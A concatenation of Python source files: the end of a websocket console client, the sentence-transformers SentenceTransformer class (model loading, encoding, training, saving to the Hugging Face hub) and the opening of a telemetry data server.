msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
import stat
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
:param use_auth_token: HuggingFace authentication token to download private models.
"""
def __init__(self, model_name_or_path: Optional[str] = None,
modules: Optional[Iterable[nn.Module]] = None,
device: Optional[str] = None,
cache_folder: Optional[str] = None,
use_auth_token: Union[bool, str, None] = None
):
self._model_card_vars = {}
self._model_card_text = None
self._model_config = {}
if cache_folder is None:
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
#Old models that don't belong to any organization
basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
if os.path.exists(model_name_or_path):
#Load from path
model_path = model_name_or_path
else:
#Not a path, load from hub
if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
raise ValueError("Path {} not found".format(model_name_or_path))
if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
# A model from sentence-transformers
model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
# Download from hub with caching
snapshot_download(model_name_or_path,
cache_dir=cache_folder,
library_name='sentence-transformers',
library_version=__version__,
ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'],
use_auth_token=use_auth_token)
if os.path.exists(os.path.join(model_path, 'modules.json')): #Load as SentenceTransformer model
modules = self._load_sbert_model(model_path)
else: #Load with AutoModel
modules = self._load_auto_model(model_path)
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
device: str = None,
normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings. Set to None, to get all output values
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param device: Which torch.device to use for the computation
:param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
if convert_to_tensor:
convert_to_numpy = False
if output_value != 'sentence_embedding':
convert_to_tensor = False
convert_to_numpy = False
input_was_string = False
if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
if output_value == 'token_embeddings':
embeddings = []
for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
last_mask_id = len(attention)-1
while last_mask_id > 0 and attention[last_mask_id].item() == 0:
last_mask_id -= 1
embeddings.append(token_emb[0:last_mask_id+1])
elif output_value is None: #Return all outputs
embeddings = []
for sent_idx in range(len(out_features['sentence_embedding'])):
row = {name: out_features[name][sent_idx] for name in out_features}
embeddings.append(row)
else: #Sentence embeddings
embeddings = out_features[output_value]
embeddings = embeddings.detach()
if normalize_embeddings:
embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
# fixes for #522 and #487 to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
:param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
:param path: Path on disc
:param model_name: Optional model name
:param create_model_card: If True, create a README.md with basic information about this model
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
modules_config = []
#Save some model info
if '__version__' not in self._model_config:
self._model_config['__version__'] = {
'sentence_transformers': __version__,
'transformers': transformers.__version__,
'pytorch': torch.__version__,
}
with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
json.dump(self._model_config, fOut, indent=2)
#Save modules
for idx, name in enumerate(self._modules):
module = self._modules[name]
if idx == 0 and isinstance(module, Transformer): #Save transformer model in the main folder
model_path = path + "/"
else:
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(modules_config, fOut, indent=2)
# Create model card
if create_model_card:
self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
"""
Create an automatic model and stores it in path
"""
if self._model_card_text is not None and len(self._model_card_text) > 0:
model_card = self._model_card_text
else:
tags = ModelCardTemplate.__TAGS__.copy()
model_card = ModelCardTemplate.__MODEL_CARD__
if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
pooling_module = self._last_module()
pooling_mode = pooling_module.get_pooling_mode_str()
model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
tags.append('transformers')
# Print full model
model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
# Add tags
model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
# Add dim info
self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
# Replace vars we created while using the model
for name, value in self._model_card_vars.items():
model_card = model_card.replace(name, str(value))
# Replace remaining vars with default values
for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
model_card = model_card.replace(name, str(value))
if model_name is not None:
model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
fOut.write(model_card.strip())
def save_to_hub(self,
repo_name: str,
organization: Optional[str] = None,
private: Optional[bool] = None,
commit_message: str = "Add new SentenceTransformer model.",
local_model_path: Optional[str] = None,
exist_ok: bool = False,
replace_model_card: bool = False):
"""
Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.
:param repo_name: Repository name for your model in the Hub.
:param organization: Organization in which you want to push your model or tokenizer (you must be a member of this organization).
:param private: Set to true, for hosting a prive model
:param commit_message: Message to commit while pushing.
:param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
:param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
:param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
:return: The url of the commit of your model in the given repository.
"""
token = HfFolder.get_token()
if token is None:
raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
if '/' in repo_name:
splits = repo_name.split('/', maxsplit=1)
if organization is None or organization == splits[0]:
organization = splits[0]
repo_name = splits[1]
else:
raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
endpoint = "https://huggingface.co"
repo_url = HfApi(endpoint=endpoint).create_repo(
token,
repo_name,
organization=organization,
private=private,
repo_type=None,
exist_ok=exist_ok,
)
full_model_name = repo_url[len(endpoint)+1:].strip("/")
with tempfile.TemporaryDirectory() as tmp_dir:
# First create the repo (and clone its content if it's nonempty).
logging.info("Create repository and clone it if it exists")
repo = Repository(tmp_dir, clone_from=repo_url)
# If user provides local files, copy them.
if local_model_path:
copy_tree(local_model_path, tmp_dir)
else: # Else, save model directly into local repo.
create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
#Find files larger 5M and track with git-lfs
large_files = []
for root, dirs, files in os.walk(tmp_dir):
for filename in files:
file_path = os.path.join(root, filename)
rel_path = os.path.relpath(file_path, tmp_dir)
if os.path.getsize(file_path) > (5 * 1024 * 1024):
large_files.append(rel_path)
if len(large_files) > 0:
logging.info("Track files with git lfs: {}".format(", ".join(large_files)))
repo.lfs_track(large_files)
logging.info("Push model to the hub. This might take a while")
push_return = repo.push_to_hub(commit_message=commit_message)
def on_rm_error(func, path, exc_info):
# path contains the path of the file that couldn't be removed
# let's just assume that it's read-only and unlink it.
try:
os.chmod(path, stat.S_IWRITE)
os.unlink(path)
except:
pass
# Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
# Hence, try to set write permissions on error
try:
for f in os.listdir(tmp_dir):
shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
except Exception as e:
logging.warning("Error when deleting temp folder: {}".format(str(e)))
pass
return push_return
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
:param checkpoint_save_steps: Will save a checkpoint after so many steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logging.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
def _load_sbert_model(self, model_path):
"""
Loads a full sentence-transformers model
"""
# Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
if os.path.exists(config_sentence_transformers_json_path):
with open(config_sentence_transformers_json_path) as fIn:
self._model_config = json.load(fIn)
if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
# Check if a readme exists
model_card_path = os.path.join(model_path, 'README.md')
if os.path.exists(model_card_path):
try:
with open(model_card_path, encoding='utf8') as fIn:
self._model_card_text = fIn.read()
except:
pass
# Load the modules of sentence transformer
modules_json_path = os.path.join(model_path, 'modules.json')
with open(modules_json_path) as fIn:
modules_config = json.load(fIn)
modules = OrderedDict()
for module_config in modules_config:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
return modules
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
server.py
|
import asyncio
import websockets
import json
import math
import time
import threading
import collections
import random
import copy
from urllib.parse import urlparse
from http.server import HTTPServer, BaseHTTPRequestHandler
toHistorical = collections.deque()
toRealTime = collections.deque()
dataRecordLock = threading.Lock()
dataRecord = {
"prop.fuel":[],
"prop.thrusters":[],
"comms.recd":[],
"comms.sent":[],
"pwr.temp":[],
"pwr.c":[],
"Generator.Voltage":[],
}
def recordData():
while True:
while toHistorical:
datum = toHistorical.popleft()
with dataRecordLock:
dataRecord[datum['id']].append(datum)
time.sleep(.05)
def getData(value, start, end):
data = []
# Only show up to 15 minutes worth of data
if end - start > 899*1000:
start = end - 899*1000
with dataRecordLock:
for datum in dataRecord[value]:
if datum['timestamp'] > start and datum['timestamp'] < end:
data.append(datum)
return json.dumps(data)
class serverHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
urlParams = urlparse(self.path)
if urlParams[2].find('history') != 1:
self.end_headers()
